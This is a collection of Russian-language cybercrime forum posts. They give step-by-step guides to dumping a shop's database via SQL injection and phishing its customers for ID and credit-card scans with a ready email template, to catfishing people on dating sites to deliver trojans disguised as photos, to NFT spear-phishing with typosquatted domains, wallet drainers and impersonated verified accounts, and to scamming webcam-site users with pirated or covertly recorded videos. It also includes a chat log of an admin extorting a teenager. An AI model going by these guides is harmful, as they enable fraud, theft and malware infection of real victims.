(рассылка,экспорт паролей,смена 2FA,копия рез кодов, поиск нужных
писем/отправителей) все возможно реализовать.
P.S. Все писалось давно, верстка и текста местами отпали, да и кодер на уровне "Hello,Worl".Тем не менее это не помешало запилить нужные софты.Можно сделать не только под google, при желании заточить можно под очень многое.
Видео по ссылке
![streamable.com](/proxy.php?image=https%3A%2F%2Fcdn-cf- east.streamable.com%2Fimage%2Fpe346z.jpg%3FExpires%3D1734199081977%26Key-Pair- Id%3DAPKAIEYUVEN4EVB2OKEQ%26Signature%3DbzMnf6dV7fjeLT2%7EC3VEqLfxDekIxYkty8VYQ%7EHzeqPz2Q5%7ET53flFlUgAFYvh0GBiy4Nz7dlnZVCIptJhrmTL02Vz5pLOUUnfBIK4jaUqvxdus0RVspsCsGUwFGTz5bFCCueohNx%7EkmdF6DEZnqavBpeLxOD4A1dfnBEKtVUgtAHs0z0LMAQ3RM61pD82mb-9DC0Mz1SxZCGHdq4DjjuVYyWGnypL3EE27bOj3ZhDZPCHzpbJtTZ5DU5OlfQuWW7xrAQIolq5uYe9kNlODZUvF- oWbT5hUpvyGFyU4Q1wZTq1FGCYh39hI- Atl7a%7EqwPn6SJbg8F6nYOT40eewBtg__&hash=ec5f234fc2af9107db78268052615df3&return_error=1)
Watch "xss-google" on Streamable.
streamable.com
**Сегодня насмотрелся видео кулхацкеров как они сайты ломаюттут решил тоже потренироваться пошел в халяву Dork's CC подправил не много дорки не чего у меня вышло с Sqli Dumper ведать стар для таких дел стал **
**Вообщем достал свой приват софт называется Havij-Advanced SOL injection Tool в народе (морковка) Нашел таблицу с названием code в ней колонка с названием cart ну все почувствовал себя мега-кулхацкеров+кардером но вот сс там х... как всегда мечты рухнули мои в одно части ** и это печально. 99% кардеров забьют на такой шоп и двинут дальше но мы не только кардеры но и кулхацкеры не стоит торопицца.
У нас на руках все заказы шопа, имена, фамилии, адреса и даты заказчиков. А теперь вспомним что обычно происходит когда мы щипаем на сс? Правильно, у на просят фото документов и кредитной карты....
Теперь мы шоп сливаем из таблицы code все что нужно order date,FName,email названия могут будь везде разные но суть думаю вы уловили.
Теперь у нас есть все что нужно. Регистрируем на hotmail.com email видаshop_name@hotmail.com или смотрим видео про подмену. Теперь мы готовы. Начинаем спамить..
**
**
Примерный текст письма
Dear FName LName,We are processing your order . As part of our security procedures, we ask that you provide the following documents:1) Your valid photo identification (e.g. passport or driving license).2) An utility bill or bank statement issued on your name, that shows your current address. Please note that such can only be accepted if it’s dated no longer than 3 months back from the current date. 3) Copy of your credit card (front and back side).Once your ID and utility bill are verified, they will be placed in a secure file and you will not be asked to re-send it in the future.Send your documents at e-mailtoshop_name@hotmail.com.Please note, if after 2 days, we do not receive legible e-mail, we will cancel your order.
**p.s Тесты проводил над Индией. Отклик составил примерно 40% тема баян но монетизировать не составит большого труда **
Прив всем... Седня пойдет речь о соц. инженерии...
Что мы будем вытворять??
Значит так:
- Задача - пройти в тыл врага ( он же сайт знакомств)
- Разместить материал, прикрепить его к делу
- Пустить админам пыль в глаза
- Внедрится в доверие
- Провести широкомасштабную операцию под названием "Ахтунг извращугам".
Начнем по порядку. Первое - Идем в поисковик и через него находим сайты
знакомств с бесплатной регой. Перед этим в том же поисковике находим фотки из
домашнего архива девушек. Эт Сделать не так трудно как кажется. Зарегаться в
мейле с женским именем и с таким же именем и логином зарегатся на сайте
знакомств... Размещаем фоточки, пишем о себе, можна взять инфу с чужой женской
анкеты ( чем сопливее тем лучше). Далее находим лезбиянок!!! Это очень важный
момент НАНЕГО ОБРАТИТЬ ВНИМАНИЕ! Почему?? Да потому что если мы начнем спамить
пацанов - то во-первых не все поведутся. А во вторых оч большие пожозрения
ждут в вашу сторону дорогие мои коллеги инженеры)))... Так..Дальше думаем что
будем впаривать?? У кого есть троян - замечательно... У кого фейк тож ниче...
Задача такая. - писать бабам лезбиянкам что вы томитесь от желания с ней
пошпиливилеть))).... Но вначале нужна обменятся фотками ( Акцент делайте на
фотки в стиле Ню) ...Если просят выложить на сайт - категорически говорите что
был печальный опыт, что вы выложили когда то фоточки свои и их какой то
гребанный спамер скопировал и насоздавал 150 анкет с вашей фоткой). ...
Все...Сказка удалася. Вам присылают мейл ... а дальше дело техники... Через
мейл отправляем троя... А Вообще вариантов уйма....))
Вы можете мне сказать что ттипа воооо пошли ща юзеры прохаваные и что например
ехе ффайлик мой не откроют...Ну что ж господа... ВАо первых можна прикрепить
иконку фотографии... Во вторых можна изменить расширение... Да да ..вы не
ослышались... У исполняемых файлов много есть расширений..Не обязательно что
это было .ехе
Есть к примеру pif Поверьте не все юзера догадываются что Пиф - эт исполняемый
файлец... Тем более у вас будет стоять иконка фото... И юзер подумает что эт
один из видов расширения изображений))))... Пробиваемая мощность такого приема
1 к 3.
В следующих наших уроках я буду говорить о таких мельких шалостей как на халяву пополнять се телефон... и куда лучше сливать это все бабло.... Пока пока мои братаны по разуму. С вами был Злодей Кот))
Вот собственно попал по глупости.Надо где раздобыть 70 вечнозеленых на покупки
лецензии ипб.Кто может скиньте хоть немного вмз.Вечно буду благодарен. :blush:
Создал еще темки на дамаге,античате,варезу.нет,так как сам набрать не смогу
зы:сорри что создал тут тему.
ззы:никого кидать я не хочу,просто тут такая ситуация назревает. :not_i:
Code:Copy to clipboard
Phantom (13:42:31 28/06/2006)
28/06/2006 (10:19 GMT +03:00)
Слушаю вас
Дела
WT (13:42:52 28/06/2006)
насчет взлома
WT (13:43:02 28/06/2006)
стучуся
Phantom (13:44:00 28/06/2006)
ааа
Phantom (13:44:15 28/06/2006)
давай
WT (13:44:23 28/06/2006)
забыл уже чтоли...тяжела работа сисадмина.Чего давать
Phantom (13:45:59 28/06/2006)
все помню
Phantom (13:46:09 28/06/2006)
есть результаты?
Phantom (13:46:25 28/06/2006)
стоп какого взлома? именно
Phantom (13:46:46 28/06/2006)
ау
WT (13:47:02 28/06/2006)
Сегодня звонил мужик моего провайдера,типа я хакернул ваш форум
Phantom (13:47:18 28/06/2006)
ок
Phantom (13:47:18 28/06/2006)
понятно
Phantom (13:47:23 28/06/2006)
Т.е. типа не хакал?
WT (13:48:36 28/06/2006)
я нет..делать нех чтоли.Нафиг мне вас хакать,если у вас там ничего интересного нету.Тем более у меня щас тяжелая пора..экзаменов куча..завал.
WT (13:49:08 28/06/2006)
а про что хоть форум то..
Phantom (13:49:33 28/06/2006)
У меня есть логи доступа к серверу. Провайдер по ним восстановил телефон. Ниточки к вам, уважаемый
Phantom (13:49:43 28/06/2006)
форум поддержки клиентов
Phantom (13:50:28 28/06/2006)
http://warezu.net/forum/member.php?find=lastposter&f=4
Phantom (13:50:36 28/06/2006)
ваша учетная запись?
WT (13:50:40 28/06/2006)
а спутниковый нет то..не ломал.Просто на форуме был,у меня друг хакал.Все говорит зайди,да зайди.А это да мое
WT (13:50:48 28/06/2006)
сознаюся
WT (13:51:37 28/06/2006)
нет погодь..щас загружу..поторопился
Phantom (13:51:38 28/06/2006)
Т.е. твой друг хакнул?
Phantom (13:52:27 28/06/2006)
Ребята я так скажу. Замечено два IP адреса. С которых заходили
WT (13:52:30 28/06/2006)
да..я в послднее время не хакаю,а именно с начала апреля.У меня экзамены.Да мой аккаунт
Phantom (13:52:39 28/06/2006)
Вероятно после твоих слов это ты и твой друг
WT (13:52:49 28/06/2006)
да я знаю..да блин
Phantom (13:53:24 28/06/2006)
Вот так вот, друзья товарищи. Друга твоего найдут в скором времени, не волнуйся, хотя мне и тебя хватит, потом сами будете решать
Phantom (13:53:52 28/06/2006)
Как возмещать ущерб будем?
WT (13:54:41 28/06/2006)
а чего будет..только суда не надо.Могу форум поставить,если надо.Денежек у меня нету..самому приходиться сводить концы с концами для инета
WT (13:57:34 28/06/2006)
я не пропал..просто нет закончился
WT (13:58:19 28/06/2006)
ау..не молчи..у меня щас голова лопнет от напряжения
Phantom (13:59:16 28/06/2006)
я с юристами общаюсь
WT (13:59:25 28/06/2006)
нафиг
Phantom (13:59:44 28/06/2006)
у нас крупная компания я один такие вещи не решаю
WT (14:00:18 28/06/2006)
блин хоть бы все обошлось..у меня родаков инфаркт хватит.Да и мне щас это не к чему
Phantom (14:01:02 28/06/2006)
Я предлагаю добровольно урегулировать этот вопрос без милиции, мне тоже не надо к ним бегать заявы писать
WT (14:01:21 28/06/2006)
ок..согласен
WT (14:03:42 28/06/2006)
я еще тут..просто нет еще впридачу лагает
Phantom (14:04:28 28/06/2006)
Деньги я с вас взять не могу, без милиции это вымогательство
WT (14:05:08 28/06/2006)
я ж говорю могу помочь поставить форум..темы посоздовать.Модераторы случаем не нужны
Phantom (14:05:10 28/06/2006)
Поэтому ребятки, вы мне купите лицензию на Invision Power Board который вы мне сломали и будем в рассчете
WT (14:05:23 28/06/2006)
а скока она стоит
Phantom (14:05:56 28/06/2006)
http://www.ibresource.ru/products/invisionpowerboard/purchase/
WT (14:05:59 28/06/2006)
да лучше поставить бажный форум,чем платить америкосам
Phantom (14:06:03 28/06/2006)
должны были бы знать
Phantom (14:06:44 28/06/2006)
Мы работаем легально.
WT (14:06:46 28/06/2006)
мдаа..придется долго ждать...пока я столько денег найду
Phantom (14:07:02 28/06/2006)
Короче с вас лицензия
Phantom (14:07:13 28/06/2006)
А вы поторопитесь, а то терпение лопнет
WT (14:07:19 28/06/2006)
блин мож без этого..слишком дорого.Я и так еле еле концы с нетом свожу
Phantom (14:07:39 28/06/2006)
Вот с другом попилите
WT (14:07:46 28/06/2006)
ну блин войди в положение мое...тем более я ничего не хакал
Phantom (14:07:47 28/06/2006)
по 35 баксов с каждого
WT (14:08:17 28/06/2006)
ага...на серфинге..по 02 вмз.Сколько ночей мне придется не спать
Phantom (14:08:33 28/06/2006)
Понимаешь у меня убытков на 10000 будет
Phantom (14:08:39 28/06/2006)
не меньше
WT (14:08:45 28/06/2006)
из-за чего
Phantom (14:08:52 28/06/2006)
мне всем клиентам сейчас поднимать новые аккаунты
Phantom (14:09:04 28/06/2006)
писать заново статьи для ламеров
WT (14:09:24 28/06/2006)
нафиг..могу статьи написать..любой физ труд..но не денежный
Phantom (14:09:34 28/06/2006)
Вот не успел я их еще скачать на локальный, а вы тут еще все хакнули
WT (14:09:37 28/06/2006)
мне легче так помочь..чем тупо серфить
Phantom (14:09:53 28/06/2006)
тебе сколько лет?
WT (14:10:01 28/06/2006)
17..
Phantom (14:10:10 28/06/2006)
а другу?
Phantom (14:10:12 28/06/2006)
тоже?
WT (14:10:16 28/06/2006)
да
WT (14:10:24 28/06/2006)
так что легко загреметь
Phantom (14:10:42 28/06/2006)
не ребята.... думайте
Phantom (14:10:49 28/06/2006)
я свои условия сказал
Phantom (14:11:01 28/06/2006)
другу превед
WT (14:11:08 28/06/2006)
ну блин..я ж сказалл.могу помочь..мне 35 баксов..придется долго копить
Phantom (14:11:15 28/06/2006)
Вас добавили
WT (14:11:27 28/06/2006)
могу помочь с чем хочешь
Phantom (14:11:38 28/06/2006)
думать надо было
Phantom (14:11:45 28/06/2006)
либо ломать так чтобы не нашли
WT (14:11:49 28/06/2006)
я не хакал блин
Phantom (14:12:06 28/06/2006)
по барабану
WT (14:12:18 28/06/2006)
ладно тогда придется серфить
WT (14:12:33 28/06/2006)
только одно условие быстро не смогу
Phantom (14:12:39 28/06/2006)
ты мне контакт друга сам даш, либо СБ провайдера будет искать?
Phantom (14:13:06 28/06/2006)
или вы там сами между собой решите кто ломал, а кто нет?
WT (14:14:04 28/06/2006)
88-902-530.А какой смысл решать кто ломал..100 процентов он будет отрицать..придется собирать мне одному 70 серфить.Он ведь ни одного вмз не даст
Phantom (14:15:36 28/06/2006)
я так могу сказать, менты разберуться кто прав кто виноват. Но это на крайний случай
WT (14:16:10 28/06/2006)
ментов сразу не надо
Phantom (14:16:22 28/06/2006)
мне самому это нах не надо.
WT (14:16:38 28/06/2006)
ладно блин успокойся..достану я где нить 70
WT (14:16:59 28/06/2006)
блин а чего он так дорого стоит
Z300270514427
U107133281895
R952581505767
E146730073073
вот тут заводят блеки друг на друга
но с другой стороны многие не брезгуют впаривать пинч
короче : как вы определяете грамотная работа СИ или кидок ?
Всех приветствую!
В первой части статьи мы рассмотрели такие
аспекты охоты на криптолохматых как:
- подготовка (аккаунты и прогрев)
- парс (на примере OpenSea)
- разведка (чек баланса, сбор базовой инфы)
Многие спросили меня, а что же делать дальше?
Сегодня я расскажу о нескольких интересных векторах атаки типа Spear phishing.
1. Начну я с одного из способов который я и мой коллега открыли случайным образом. В результате мы можем заставить Chrome перенаправлять пользователей с легитимного сайта на НАШ фишинговый.
Предыстория для понимания процесса :
- Мы выбрали нишевый сайт музыкальной NFT-коллекции
- Сделали точную копию без изменений, заменили ссылки на социальные сети на
свои (фейковые)
- Главную кнопку на сайте сделали ведущей на WalletConnect (подключили
дрейнер)
- В качестве трафика использовали Twitter Ads (даже без кло в качестве
эксперимента)
- ВНИМАНИЕ - домен отличался от легитимного лишь ОТСУТСТВИЕМ 1 БУКВЫ
в середине
- Организовали небольшой тестовый пролив
Примечание : оригинальная коллекция/сайт были уже малопопулярны на тот
момент, когда мы решили пролить на фейк, соответственно их сайт также был
малопосещаемым.
Результат : посещаемость фейка из-за пролива стала выше (наш фейк хорошо
индексировался), при посещении ОРИГИНАЛЬНОГО сайта Chrome стал выдавать
алерт:
Предположение почему так могло произойти :
- возможно алгоритмы Google определяют фишинговые сайты с минимально-
отличимыми доменами на основе своих факторов репутации, таких как
посещаемость.
Почему Google не изучает архивные копии, дату регистрации домена и тому
подобное? Не знаю.
НО этот способ работает и мы уже разместили большое количество ловушек на
NFT-проектах, которые были немного забыты и снимаем поклевку
СЛИЛ ВАМ РАБОЧИЙ СПОСОБ - ИСПОЛЬЗУЙТЕ
(возможно вы найдете применение и в других областях, не только NFT)
Таким образом вы можете генерировать траффик напрямую:
- С официальных Twitter-аккаунтов (там часто закрепляют ссылку)
- Из поисковой выдачи
- Из описания на YouTube, Instagram и т.п.
Так как теперь легитимный адрес будет направлять всех на ваш ФИШ
2. Вкатываемся в ленту выдачи Twitter.
Этот способ я упомянул в предыдущей статье, а сейчас расскажу непосредственно
реализацию.
Предыстория: данный способ был придуман не мной в отличии от предыдущего,
но я обнаружил его в алертах Twitter у одной из жертв, когда она рассказала
как была обманута.
Когда Elon Musk добавил в Twitter подписку Blue (которая дает галочку около ника), Twitter был наводнен волной скама, т.к. на самом старте галочка по инерции внушала доверие.
Данным способом был похищен BAYC (NFT одной из самых популярных и дорогих коллекций) стоимостью **$185.000
Реализация атаки:**
- Выбираем NFT-коллекцию, аудиторию которой будем атаковать
- Верифицируем Blue
- Создаем МАКСИМАЛЬНО трастовый профиль (более 40к твитов, большое
количество медиа, лайков, верифицированный NFT-аватар, желательно девушка,
красивый .eth домен, накрутка подписчиков, лайки/репосты/просмотры на
последние посты)
- Парсим МАКСИМАЛЬНОЕ количество холдеров и добавляем в базу
- Используя любой удобный софт/вручную делаем фолов на них
- Дожидаемся некоторое время ответного фолова (т. к. у вас красивый профиль
даю гарантию почти на 30% отклик)
(ПРИ ВЗАИМНОМ ФОЛОВЕ ВАШИ ПОСТЫ ПОПАДАЮТ В ИХ ВЫДАЧУ)
- Когда взаимный фолов остановился и собрали максимальную аудиторию -
переходим к следующему шагу
- Меняем АВАТАР и ИМЯ как у оригинального Twitter - ожидаем аппрува
отTwitter (Elon твоя система модерации полное д@рьмо!)
- Делаем анонс МЕРОПРИЯТИЯ НО ТОЛЬКО НЕ AIRDROP и FREE MINT ПОЖАЛУЙСТА ЭТО RED FLAG
- Обязательно выдерживаем оригинальную стилистику (предварительно изучите)
легитимного проекта, СДЕЛАЙТЕ КРАСИВОЕ КРЕО ПОТРАТЬТЕ 50$ НЕ ЖАЛЕЙТЕ
- Оставляем линк на ДРЕЙНЕР ( используем редактор текста, в тексте
указываем настоящий домен, выделяем и делаем гиперссылку на фиш)
(фишинговый домен обязательно должен также отличаться минимально, рекомендую
терять/заменять/добавлять 1 букву в середине, т.к. это особенность
психологии читать слова по началу и концу минуя середину) (ссылка на фиш в
любом случае засветиться около поста ниже, поэтому отличия минимальны)
- Крутим лайки, просмотры на пост, комментарии можно отключить (возможно
RED FLAG), в идеале затушить их со своих аккаунтов заранее также
подготовленных, позитивными комментариями)
Данный способ атаки я видел только 1 раз в алертах (успешно) и ни разу не
видел более, т.е. он живой и не применяется массово!
Все долбят @теги которые уже никого не заводят. ПОЭТОМУ ИСПОЛЬЗУЕМ пока дает
Для большего доверия можете оформить описание, стену и другие части аккаунта под оригинал (в идеале) + также пробуем изучать и находить наиболее активных амбассадоров проекта и косить под них, т.к. с моей точки зрения даже самый внимательный проще разведется на фейк-амбассадора, нежели фейк самого проекта, но и это тоже работает.
Продвинутый вариант если у вас есть немного кэша:
В случае прошлой атаки сама жертва указала в алерте, что НЕ заметила 1
отличие: фейковый Twitter был верифицирован как Blue, а оригинал как GOLD.
Как мы знаем, золотую галочку сейчас тоже сделать не проблема! Когда они
появились количество фейк-инфлюенсеров зашкаливало.
Но чтобы не тратить 3000$ на одну атаку с высоким трастом (примерно столько
стоит галка + услуга по оформлению) , сразу готовим несколько атак на
несколько проектов.
Каким образом:
1. Создаем мама-аккаунт (основу) и верифицируем GOLD
2. Создаем аккаунты для пролива по схеме выше - нагоняем на них в фоловеры
потенциальную аудиторию лохматых
3. Переименовываем / меняем аватарки на аккаунтах - верифицируем Blue
4. Вешаем с мама-аккаунта на аккаунты для пролива статус сотрудников И ВСЕ
НАШИ АККАУНТЫ ПОЛУЧАТGOLD(придется немного доплатить за каждый)
5. Проливаем с аккаунтов с золотыми галками, теперь отличий в имени /
аватарке / галке **НЕТ
3. Классический способ (адверт)**
Данный способ проще в реализации с точки зрения подготовки, но не отличается
массовостью в отличии от предыдущих. Главная задача - инициация контакта -
прогрев (интенсивность и характер зависит от легенды и подхода, наличия
раздаточного материала) - завод.
Что использовать стиллер или дрейнер?
Я рекомендую держать в арсенале ОБА инструмента.
Так как сценария развития у нас четыре:
1. Человек знает об опасности загрузки стороннего ПО (в таком случае,
возможно, ваш прогрев недостаточный/раздатка слабая/не смогли замотивировать)
2. Человек боится переходить по ссылкам / подключать кошелек (см. пункт выше,
слабый прогрев/мотивация)
3. Человек не знает о стиллерах / дрейнерах.
4. Знает об обоих инструментах
При ЛЮБОМ из раскладов вы имеете все шансы завести! Почему?
Потому что у каждого мамонта есть список RED FLAGS в его голове, а-ля чек-
лист.
Если вы смогли сделать качественный дизайн + соц. сети, раздатку - это 50%.
Вторые 50% это МОТИВАЦИЯ, т.е. главное заинтересовать!
Если вы смогли замотивировать - в 80% случаев мамонт ЗАКРЫВАЕТ ГЛАЗА НА ЛЮБЫЕ RED FLAGS и на него можно и нужно давить!
Можно использовать, как бы это не звучало, давление на любой этичной/неэтичной
почве.
Простой вариант - на основе деловой репутации. Неэтичный вариант - религия.
Да, это работает!
Я видел огромное количество логов/алертов применимо к мусульманским странам,
где давили через этот вектор!
Не буду затрагивать мораль, но рассказал так как это имеет место быть/есть на
практике.
Дословный пример из успешного лога:
- Мамонт загрузил софт
- Поймал детект
- Я клянусь алл@хом! Клянусь сердцем матери и головой сына, что тут нет
вирусов! Ты готов ответить перед всевышним на суде за то, что назвал меня
лжецом?
- Мамонт скипает АВ.
НИКОГО НЕ ХОТЕЛ ЗАДЕТЬ ЕСЛИ ЕСТЬ ПРЕДСТАВИТЕЛИ КОНФЕССИИ НА ФОРУМЕ!
Как понять какой чек-лист RED FLAGS, на что примерно ориентироваться?
- Вы можете посетить Discord любого крупного NFT-проекта, у каждого из них
есть уголок безопасности где они рассказывают как отличить мошенника, на что
обратить внимание - ИСПОЛЬЗУЕМ в обратную сторону!
Все что касается RED FLAGS, отработке возражений, СИ при скипе АВ, какую раздатку и как использовать - если вам интересно готов рассказать в следующей статье.
Всех люблю и желаю жирных профитов!**
Специально для XSS.is (XSS.as) от
Албанца!**
Spoiler
Вебкам-модель термин, который на сегодняшний день активно вошёл в наш обиход.
Это огромная индустрия сексуальных желаний, фантазий и извращений. На такие
похотливые патишоу слетается со всего мира мужской и женский спецконтингент,
который готов легко расстаться со своим капиталом и поделиться им не только с
вебкам-моделями, но и передать денежные знаки в доверительное управление
третьим лицам. Казалось бы, на этом можно закончить, но это далеко не конец
истории…
Начну с рутины, но вы сами понимаете без этого никуда, хотя все практически
возразят, что в вебкам-чатах никакого мастерства и особого умения не
требуется, поэтому справится даже школьник первоклашка. Возможно, я возражать
не буду, но правила хорошего тона, тоже никто не отменял.
Прежде всего помните львиная доля пользующихся услугами вебкам-моделей либо студенты, которые увы на всем экономят и сказать, что обожают халяву ничего не сказать, поэтому они чаще всего попрошайничают и клянчат, следовательно это не наш контингент; вторая категория намного перспективная, они обожают шалости, им страстно хочется новизны и всесторонней распущенности, которую увы не получить, внимание – в семье, да, да – это семейные папики (возраст обычно от сорока плюс), жизнь которых стала пресной и им хочется развеется с молоденькими модельками.
Далее я буду вести повествование фрагментами перспективного проецирования для лучшего восприятия и получения объемно пространственного мышления, то есть, как видит скамер и как это видит папик. Итак, мы на главной странице вебкам- чата, здесь представлен почти весь подиум моделей на любой вкус, конечно, все модельки разделены по категориям: блондинки, брюнеточки и т.д.
Spoiler
Папик, здесь видит на первом экране всех топовых моделек, которые на данный момент в режиме онлайн, разумеется посещалка у этих моделей от 1000 пользователей и более. Но пока на данном этапе папик в дрейфующем состоянии, как говорится эпитетов можно много привести, но самый подходящий – видит око, да зуб не имёт.
Скамер – тут намного всё профессиональнее, я знаю пароль, я вижу объектив, я вижу ориентир! Иначе говоря, цели у скамера и папика пока идентичны – ищем жертву, педантично прицениваясь: папики выбирают моделей, тщательно разглядывая гифки полуобнаженных нимф, а вот скамер ищет «рыбное место», где сегодня жор у папиков, то есть как раз акцентрируем внимание на объемы (количественную концентрацию, обычно это цифра расположена в правом нижнем углу гифки) посещалки того или иного чата модели.
Допустим с объектом определились, далее переходим ко второму шагу, а именно уже непосредственно переходим в чат вебкам-модели.
Spoiler
Если обратить внимание, то справа от вебтрансляции будет расположен публичный чат, у которого есть две вкладки.
Папики обычно тусят в самом чате: шлют комплименты, смайлики моделькам, так же там идёт история чата по передачи токенов, кто сколько закинул для разжигания страсти у моделей. Одним словом, там папики меряются пиписьками друг перед другом и подымают свой авторитет перед самой моделью, хотя стоит отметить, она уже предварительно может видеть у кого сколько на балансе токенов у её папиков с момента их входа в её чат до того, как они начнут тратить токены.
Скамеру же больше интересна вторая вкладка чата, которая показывает никнеймы самих папиков и тут внимание, обычно они расположены не в алфавитном порядке, а именно как раз по балансу токенов, хотя эта цифра публично не отображается. Так же здесь показано, кто сидит с какого устройства в чате, обычно это десктоп или мобильное средство, но нам будет интересна крайняя колонка в которой отображаются достижения папиков по иерархии на самом сайте вебкама. У каждого вебкама эти статусы разные, у Бонги иерархия следующая:
• GOLD – от 100 до 300 €
• PLATINUM - 303.03 €
• UNLIMITED - 1,303.03 €
• SAPPHIRE - 1,803.03 €
• TITAN - 2,803.03 €
• DIAMOND - 5,000.00 €
• EXCLUSIVE – свыше 10,000.00 €
Нам самый подходящий вариант со статусом GOLD, это те юзеры, которые уже сделали от одного до нескольких пополнений своего баланса для приобретения местной валюты, которая называется токенами, сам прайс выглядит так:
Spoiler
Если у вас возник вопрос почему именно, только эти папики будут нас интересовать, то отвечу, все остальные статусы сами видите получают пользователи, которые пополнились, так сказать, как будто в офлайне посетили салон для больших мальчиков со жрицами любви. Стоит отметить, что бывает ещё статус VIP, эти нас тоже не интересуют, вот ответ:
Spoiler
то есть у них бесплатный абонемент, так сказать. Конечно, опасайтесь пользователей, которые имеют статус Moderator – это местные стражи порядка, поэтому от них лучше держаться подальше. Если вернуться к самому списку пользователей в чате, то при клике на любом никнейме открывается всплывающее окно с возможностью написать личное сообщение:
Spoiler
Просмотреть расширенную информацию о папике, обращайте внимание на дату регистрации, обычно если она свежая, то такие новички традиционно менее осторожны и легко идут на контакт, хотя бывает встречаются случаи мультиаккинга (у одного и того же пользователя сразу несколько аккаунтов) или перерегистрации (прошлый аккаунт был забанен и папик по-новой зарегистрировался на сайте). Это всё речь про тех пользователей, которые сейчас онлайн, но можно добавить в свою базу для скама папиков, которые офлайн, а для этого всего-навсего достаточно просмотреть анкету вебкам-модели, в которой будет список её подписчиков и подписок:
Spoiler
Списки, как можете увидеть внушительные доходят до 10000 и более, но не обольщайтесь, тут могут быть мертвые души, пользователи, которые один раз пришли и больше потом не появлялись на сайте, поэтому лучше накапливать контакт-лист из тех, кто в онлайне.
Отдельно стоит заострить внимание на том, что конкретно у Бонги существует масса поддоменов для ГЕО-таргетинга пользователей, всё это сделано с целью, чтоб пользователи, например с IP-России не пересекались с пользователями, у которых IP-Франции. По сути, в онлайн трансляции русские будут видеть, как и французы одну и туже вебкам-модель, но в текстовом чате папики из России будут просматривать только комментарии на русском языке, а папики из Франции комментарии, которые оставляют французы, поэтому умение пользоваться VPN для смены своего IP-адреса, только приветствуется. Да, и в дальнейшем знание иностранных языков, как следствие будет весьма востребовано, ведь контингент будет интернациональный.
Вот плавно мы подошли после всех базовых установок к самой схеме скама, которая заключается в том, что папики помимо онлайн-трансляций, покупают охотно видеоролики смонтированные самими вебкам-моделями, сами видео размещаются на Бонге в профилях моделей:
Spoiler
Если обратите внимание, то ценник в 2000 токенов – это немного не мало 100 Евро, при этом внятного описания нет, какой продолжительности видео, какой сюжет и т.д. Реально кот в мешке! Папик - он считает себя прошаренным и в итоге стремится: "И на х#й сесть и рыбку съесть”, - (простите меня за такие эпитеты, но как говорится из песни слов не выкинешь), по сути, увидеть запретный плод и при этом не шибко раскошелится. А скамер, как Робин Гуд спешит на помощь.
Но что мешает нам самим делать подобного рода видео-контент с той или иной вебкам-моделью, а потом якобы в складчину приобретать этот видеоролик на двоих с каким-нибудь папиком из контакт-листа той или иной красавицы. Как папиков находить я уже выше показал, осталось дело за малым, это с кем-нибудь подружиться, втереться в доверие на различные темы, начиная от сегодняшнего настроения модели вплоть до её размеров молочных желез, зоны бикини, татуировок, пирсинга и т.д. Вот пример социальной инженерии для обработки одного из папиков:
Spoiler
После такой теплой беседы не забудьте добавиться к нему в друзья и у себя его зафрендить, чтоб потом было ещё проще строить отношения. Но возникает вопрос, где же взять видео, не покупать же его в конце концов? Ответ на этот вопрос тривиален, всё уже давно за нас придумано и сделано, тут есть два варианта.
Первый вариант, это взять уже готовое видео с торрент-трекера Порнолаб или аналогичных, на самом трекере расположены два интересующих нас раздела, это:
• Русские Порноролики Разное / Russian Clips (various)
• Русское любительское видео / Russian Amateur Video
Spoiler
если внимательно приглядитесь, то тут помимо Бонги есть и другие вебкамы, сами же трекеры удобно оформлены, так что мы можем с легкостью разыскать ту или иную модель по её никнейму, после того как искомый торрент будет найден, его необходимо загрузить к себе на ПК и потом перезалить на какое-нибудь онлайн- облако или виртуальный диск: Googledrive, Mega, ЯндексДиск и другие. После успешной загрузки на облако у нас будет расшаренный линк для удаленной загрузке этого файла сторонними пользователями. Нам стоит этот URL-адрес сохранить себе в записной книжке для дальнейшей работы по скаму папиков. А именно, когда уже установились дружественные отношения, можно переходить к активной схеме, это тот самый момент, когда можно смело им предлагать в складчину, мол приобрести видео той или иной вебкам-модели. Вариантов тут может быть много, я работаю по минималкам, то есть в полцены от суммы, которую установила сама модель, сам ценник дополнительно я ещё делю наполовину – получаю ту цифру долевого участия, которую необходимо перевести для покупки, заметьте я же платить ничего не буду, так как видео ролик не будет приобретаться у самой модели напрямую, более того сам этот ролик я бесплатно скачал с торрент-трекера и по итогам мой оппонент получит ссылочку на виртуальный диск, где я заблаговременно разместил этот видео контент. Так опытным путём я нашёл золотую середину, когда 25 Евро — это не так много, чтоб потерять для папика, но и не так мало, чтоб сэкономить - полтинник адекватный ценник на двоих. Обычно мелкие суммы не вызывают подозрения, никого не тяготят обязательствами, да и само желание поучаствовать в совместной хитрой махинации подкупает искренностью и заслуживает доверия со стороны оппонента, правда с европейцами караул, они как все на подбор: махинациям - «НЕТ», а изменам жен – «ДА», так что с ними надо немного иначе вести переговоры. Если не жадничать, быть на позитиве и проявлять скромность, то из десятка двух-трех папиков с которыми можно успеть пообщаться за день, то в среднем от 3-5 человек можно склонить к покупке в обычные будние дни. Просто надо принимать во внимание, что многие папики традиционно пополняют свой баланс в начале месяца, когда период получения заработанной платы, разумеется, они делают заначку для Бонги. Конечно, охотнее идут также на совместные покупки взрослые мальчики в конце рабочей недели, в пятницу и по праздничным дням.
Второй вариант получения видео контента немного сложнее, но также легко реализуем. Из необходимого софта дополнительно потребуется любое приложение для записи видео с рабочего стола монитора. Тут главное правильно настроить область захвата, так чтоб в кадр не попадали различные знаки авторского права (DMCA протектед и т.д.):
Spoiler
Достаточно будет записывать интересные моменты: сквирт, анальные игры и т.д., всё что будоражит головы папиков, после записи видео, делаем идентичные действия, что и в первом варианте. Загружаем на виртуальный диск, папика разматываем на складчину и впариваем ему наше видео, за это получаем нормальный лавандос себе на баланс. Схема поддается масштабированию, если в статье я продемонстрировал, как с нуля выйти на 30-50 долларов в день, то при реинвестировании этих средств, можно самим покупать приваты с вебкамщицами и при этом совмещать приятное с полезным, пока они творят свои кульбиты, расширяя все свои отверстия для меня, я в это время её эротические движения фиксирую на видео, разумеется ей об этом ни слова!
Спалю некоторую хитрость, которую я успешно использую, хотя на неё я наткнулся случайно, это когда видеотрансляция стрима вебкам-модельки заканчивается, чат остается ещё активным примерно 5-10 минут, поэтому сама модель как бы уже в офлайне, а папики ещё не успели разбежаться по другим девочкам, поэтому те кто ещё в чате пассивно сидят, я их обожаю драконить через личную переписку на складчину покупки видосиков и процент отказов в таких случаях то же минимален, многие готовы поучаствовать в разврате без личного присутствия хозяйки в чате.
